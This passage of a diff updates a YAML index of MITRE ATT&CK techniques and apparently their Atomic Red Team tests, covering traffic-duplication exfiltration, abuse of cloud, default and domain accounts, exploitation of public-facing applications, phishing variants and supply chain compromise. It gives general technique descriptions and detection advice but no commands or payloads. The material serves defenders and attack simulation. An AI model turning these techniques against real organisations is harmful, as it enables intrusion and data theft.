- Windows + x_mitre_data_sources: + - Network protocol analysis + - Netflow/Enclave netflow + - Packet capture + - Process use of network x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ' - x_mitre_data_sources: - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture - - Process use of network - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_network_requirements: true + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' identifier: T1048.003 atomic_tests: - name: Exfiltration Over Alternative Protocol - HTTP @@ -54510,6 +60149,65 @@ exfiltration: - Process monitoring x_mitre_version: '1.1' atomic_tests: [] + T1020.001: + technique: + created: '2020-10-19T13:40:11.118Z' + modified: '2020-10-22T02:24:54.640Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + type: attack-pattern + id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1 + description: |- + Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring) + + Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. + name: Traffic Duplication + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1020.001 + url: https://attack.mitre.org/techniques/T1020/001 + - external_id: CAPEC-117 + source_name: capec + url: https://capec.mitre.org/data/definitions/117.html + - source_name: Cisco Traffic Mirroring + url: https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html + description: Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component + Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October + 19, 2020. + - source_name: Juniper Traffic Mirroring + url: https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html + description: Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, + EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved + October 19, 2020. + - source_name: US-CERT-TA18-106A + url: https://www.us-cert.gov/ncas/alerts/TA18-106A + description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored + Cyber Actors Targeting Network Infrastructure Devices. Retrieved October + 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + x_mitre_platforms: + - Network + x_mitre_data_sources: + - Netflow/Enclave netflow + - Packet capture + - Network protocol analysis + x_mitre_detection: 'Monitor network traffic for uncommon data flows (e.g. unusual + network communications, suspicious communications that have never been seen + before, communications sending fixed size data packets at regular intervals). Analyze + packet contents to detect communications that do not follow the expected protocol + behavior for the port that is being used. ' + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] T1537: technique: external_references: @@ -54566,6 +60264,15 @@ exfiltration: initial-access: T1078.004: technique: + id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 + description: |- + Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) + + Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. + name: Cloud Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078.004 @@ -54582,15 +60289,6 @@ initial-access: url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs description: Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cloud Accounts - description: |- - Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) - - Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. - id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -54601,21 +60299,8 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:59:36.729Z' + modified: '2020-10-19T16:01:22.090Z' created: '2020-03-13T20:36:57.378Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal - or malicious activity, such as accessing information outside of the normal - function of the account or account usage at atypical hours. - x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs x_mitre_platforms: - AWS - GCP @@ -54623,6 +60308,19 @@ initial-access: - SaaS - Azure AD - Office 365 + x_mitre_data_sources: + - Azure activity logs + - Authentication logs + - AWS CloudTrail logs + - Stackdriver logs + x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal + or malicious behavior, such as accessing information outside of the normal + function of the account or account usage at atypical hours. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' atomic_tests: [] T1195.003: technique: @@ -54760,6 +60458,9 @@ initial-access: - source_name: mitre-attack external_id: T1078.001 url: https://attack.mitre.org/techniques/T1078/001 + - external_id: CAPEC-70 + source_name: capec + url: https://capec.mitre.org/data/definitions/70.html - source_name: Microsoft Local Accounts Feb 2019 url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts description: Microsoft. (2018, December 9). Local Accounts. Retrieved February @@ -54786,9 +60487,9 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:37:34.567Z' + modified: '2020-09-16T19:41:43.491Z' created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -54839,31 +60540,13 @@ initial-access: elevation_required: true T1078.002: technique: - created: '2020-03-13T20:21:54.758Z' - modified: '2020-03-23T21:08:40.063Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - type: attack-pattern - id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f - description: |- - Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) - - Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. - name: Domain Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078.002 url: https://attack.mitre.org/techniques/T1078/002 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html - url: https://technet.microsoft.com/en-us/library/dn535501.aspx description: Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. @@ -54876,22 +60559,43 @@ initial-access: description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. source_name: TechNet Audit Policy - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Authentication logs - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Accounts + description: |- + Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) + + Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. + id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2020-09-16T19:42:11.787Z' + created: '2020-03-13T20:21:54.758Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator x_mitre_detection: |- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - Authentication logs + - Process monitoring + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] T1189: technique: @@ -54984,8 +60688,27 @@ initial-access: atomic_tests: [] T1190: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + id: attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exploit Public-Facing Application + description: "Adversaries may attempt to take advantage of a weakness in an + Internet-facing computer or program using software, data, or commands in order + to cause unintended or unanticipated behavior. The weakness in the system + can be a bug, a glitch, or a design vulnerability. These applications are + often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), + standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or + SSH), network device administration and management protocols (like SNMP and + Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: + Cisco Blog Legacy Device Attacks)), and any other applications with Internet + accessible open sockets, such as web servers and related services.(Citation: + NVD CVE-2014-7169) Depending on the flaw being exploited this may include + [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). + \n\nIf an application is hosted on cloud-based infrastructure, then exploiting + it may lead to compromise of the underlying instance. This can allow an adversary + a path to access the cloud APIs or to take advantage of weak identity and + access management policies.\n\nFor websites and databases, the OWASP top 10 + and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: + OWASP Top 10)(Citation: CWE top 25)" external_references: - source_name: mitre-attack external_id: T1190 @@ -54998,6 +60721,14 @@ initial-access: description: CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018. source_name: CIS Multiple SMB Vulnerabilities + - source_name: US-CERT TA18-106A Network Infrastructure Devices 2018 + url: https://us-cert.cisa.gov/ncas/alerts/TA18-106A + description: US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors + Targeting Network Infrastructure Devices. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. - url: https://nvd.nist.gov/vuln/detail/CVE-2014-7169 description: National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018. @@ -55011,25 +60742,26 @@ initial-access: description: Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019. - description: |- - Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). - - If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies. - - For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) - name: Exploit Public-Facing Application - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-02-18T16:10:38.866Z' + modified: '2020-10-21T01:10:54.358Z' created: '2018-04-18T17:59:24.739Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Praetorian - x_mitre_version: '2.1' + x_mitre_platforms: + - Linux + - Windows + - macOS + - AWS + - GCP + - Azure + - Network + x_mitre_detection: Monitor application logs for abnormal behavior that may indicate + attempted or successful exploitation. Use deep packet inspection to look for + artifacts of common exploit traffic, such as SQL injection. Web Application + Firewalls may detect improper inputs attempting exploitation. x_mitre_data_sources: - Azure activity logs - AWS CloudTrail logs @@ -55038,17 +60770,10 @@ initial-access: - Web logs - Web application firewall logs - Application logs - x_mitre_detection: Monitor application logs for abnormal behavior that may indicate - attempted or successful exploitation. Use deep packet inspection to look for - artifacts of common exploit traffic, such as SQL injection. Web Application - Firewalls may detect improper inputs attempting exploitation. - x_mitre_platforms: - - Linux - - Windows - - macOS - - AWS - - GCP - - Azure + x_mitre_version: '2.2' + x_mitre_contributors: + - Praetorian + x_mitre_is_subtechnique: false atomic_tests: [] T1133: technique: @@ -55158,8 +60883,11 @@ initial-access: March 2012), and others.' external_references: - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1200 external_id: T1200 + url: https://attack.mitre.org/techniques/T1200 + - external_id: CAPEC-440 + source_name: capec + url: https://capec.mitre.org/data/definitions/440.html - url: https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html description: Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018. @@ -55187,7 +60915,7 @@ initial-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-07-14T19:36:40.493Z' + modified: '2020-09-16T16:12:48.086Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -55201,7 +60929,7 @@ initial-access: x_mitre_data_sources: - Asset management - Data loss prevention - x_mitre_version: '1.0' + x_mitre_version: '1.1' atomic_tests: [] T1078.003: technique: @@ -55252,6 +60980,15 @@ initial-access: atomic_tests: [] T1566: technique: + id: attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b + description: |- + Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. + + Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms. + name: Phishing + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1566 @@ -55259,21 +60996,28 @@ initial-access: - external_id: CAPEC-98 source_name: capec url: https://capec.mitre.org/data/definitions/98.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Phishing - description: |- - Adversaries may send phishing messages to elicit sensitive information and/or gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. - - Adversaries may send victim’s emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms. - id: attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-28T00:04:46.427Z' + modified: '2020-10-18T01:55:03.337Z' created: '2020-03-02T18:45:07.892Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + - SaaS + - Office 365 + x_mitre_detection: |- + Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems. + + URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. + + Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. + + Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. + x_mitre_is_subtechnique: false + x_mitre_version: '2.0' x_mitre_data_sources: - File monitoring - Packet capture @@ -55284,22 +61028,6 @@ initial-access: - Detonation chamber - SSL/TLS inspection - Anti-virus - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_detection: |- - Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems. - - URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. - - Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. - - Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. - x_mitre_platforms: - - Linux - - macOS - - Windows - - SaaS - - Office 365 atomic_tests: [] T1091: technique: @@ -55362,7 +61090,7 @@ initial-access: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing Attachment description: |- - Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. + Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. id: attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597 @@ -55370,9 +61098,9 @@ initial-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-27T23:56:40.369Z' + modified: '2020-10-18T01:52:25.316Z' created: '2020-03-02T19:05:18.137Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_detection: |- Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems. @@ -55458,33 +61186,26 @@ initial-access: name: powershell T1566.002: technique: - created: '2020-03-02T19:15:44.182Z' - modified: '2020-03-02T19:44:47.843Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: initial-access - type: attack-pattern id: attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7 description: "Adversaries may send spearphishing emails with a malicious link - in an attempt to elicit sensitive information and/or gain access to victim - systems. Spearphishing with a link is a specific variant of spearphishing. - It is different from other forms of spearphishing in that it employs the use - of links to download malware contained in email, instead of attaching malicious - files to the email itself, to avoid defenses that may inspect email attachments. - \n\nAll forms of spearphishing are electronically delivered social engineering - targeted at a specific individual, company, or industry. In this case, the - malicious emails contain links. Generally, the links will be accompanied by - social engineering text and require the user to actively click or copy and - paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). - The visited website may compromise the web browser using an exploit, or the - user will be prompted to download applications, documents, zip files, or even - executables depending on the pretext for the email in the first place. Adversaries - may also include links that are intended to interact directly with an email - reader, including embedded images intended to exploit the end system directly - or verify the receipt of an email (i.e. web bugs/web beacons). Links may also - direct users to malicious applications designed to [Steal Application Access - Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in - order to gain access to protected applications and information.(Citation: + in an attempt to gain access to victim systems. Spearphishing with a link + is a specific variant of spearphishing. It is different from other forms of + spearphishing in that it employs the use of links to download malware contained + in email, instead of attaching malicious files to the email itself, to avoid + defenses that may inspect email attachments. \n\nAll forms of spearphishing + are electronically delivered social engineering targeted at a specific individual, + company, or industry. In this case, the malicious emails contain links. Generally, + the links will be accompanied by social engineering text and require the user + to actively click or copy and paste a URL into a browser, leveraging [User + Execution](https://attack.mitre.org/techniques/T1204). The visited website + may compromise the web browser using an exploit, or the user will be prompted + to download applications, documents, zip files, or even executables depending + on the pretext for the email in the first place. Adversaries may also include + links that are intended to interact directly with an email reader, including + embedded images intended to exploit the end system directly or verify the + receipt of an email (i.e. web bugs/web beacons). Links may also direct users + to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, + like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)" name: Spearphishing Link created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -55501,6 +61222,12 @@ initial-access: url: https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks description: Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2020-10-18T01:53:39.818Z' + created: '2020-03-02T19:15:44.182Z' x_mitre_platforms: - Linux - macOS @@ -55512,7 +61239,7 @@ initial-access: Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_data_sources: - Packet capture - Web proxy @@ -55541,39 +61268,38 @@ initial-access: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing via Service description: "Adversaries may send spearphishing messages via third-party services - in an attempt to elicit sensitive information and/or gain access to victim - systems. Spearphishing via service is a specific variant of spearphishing. - It is different from other forms of spearphishing in that it employs the use - of third party services rather than directly via enterprise email channels. - \n\nAll forms of spearphishing are electronically delivered social engineering - targeted at a specific individual, company, or industry. In this scenario, - adversaries send messages through various social media services, personal - webmail, and other non-enterprise controlled services. These services are - more likely to have a less-strict security policy than an enterprise. As with - most kinds of spearphishing, the goal is to generate rapport with the target - or get the target's interest in some way. Adversaries will create fake social - media accounts and message employees for potential job opportunities. Doing - so allows a plausible reason for asking about services, policies, and software - that's running in an environment. The adversary can then send malicious links - or attachments through these services.\n\nA common example is to build rapport - with a target via social media, then send content to a personal webmail service - that the target uses on their work computer. This allows an adversary to bypass - some email restrictions on the work account, and the target is more likely - to open the file since it's something they were expecting. If the payload - doesn't work as expected, the adversary can continue normal communications - and troubleshoot with the target on how to get it working." + in an attempt to gain access to victim systems. Spearphishing via service + is a specific variant of spearphishing. It is different from other forms of + spearphishing in that it employs the use of third party services rather than + directly via enterprise email channels. \n\nAll forms of spearphishing are + electronically delivered social engineering targeted at a specific individual, + company, or industry. In this scenario, adversaries send messages through + various social media services, personal webmail, and other non-enterprise + controlled services. These services are more likely to have a less-strict + security policy than an enterprise. As with most kinds of spearphishing, the + goal is to generate rapport with the target or get the target's interest in + some way. Adversaries will create fake social media accounts and message employees + for potential job opportunities. Doing so allows a plausible reason for asking + about services, policies, and software that's running in an environment. The + adversary can then send malicious links or attachments through these services.\n\nA + common example is to build rapport with a target via social media, then send + content to a personal webmail service that the target uses on their work computer. + This allows an adversary to bypass some email restrictions on the work account, + and the target is more likely to open the file since it's something they were + expecting. If the payload doesn't work as expected, the adversary can continue + normal communications and troubleshoot with the target on how to get it working." id: attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-28T00:04:46.264Z' + modified: '2020-10-18T01:55:02.988Z' created: '2020-03-02T19:24:00.951Z' x_mitre_data_sources: - SSL/TLS inspection - Anti-virus - Web proxy - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_detection: "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required @@ -55592,8 +61318,30 @@ initial-access: atomic_tests: [] T1195: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Supply Chain Compromise + description: "Adversaries may manipulate products or product delivery mechanisms + prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply + chain compromise can take place at any stage of the supply chain including:\n\n* + Manipulation of development tools\n* Manipulation of a development environment\n* + Manipulation of source code repositories (public or private)\n* Manipulation + of source code in open-source dependencies\n* Manipulation of software update/distribution + mechanisms\n* Compromised/infected system images (multiple cases of removable + media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider + Electric USB Malware) \n* Replacement of legitimate software with modified + versions\n* Sales of modified/counterfeit products to legitimate distributors\n* + Shipment interdiction\n\nWhile supply chain compromise can impact any component + of hardware or software, attackers looking to gain execution have often focused + 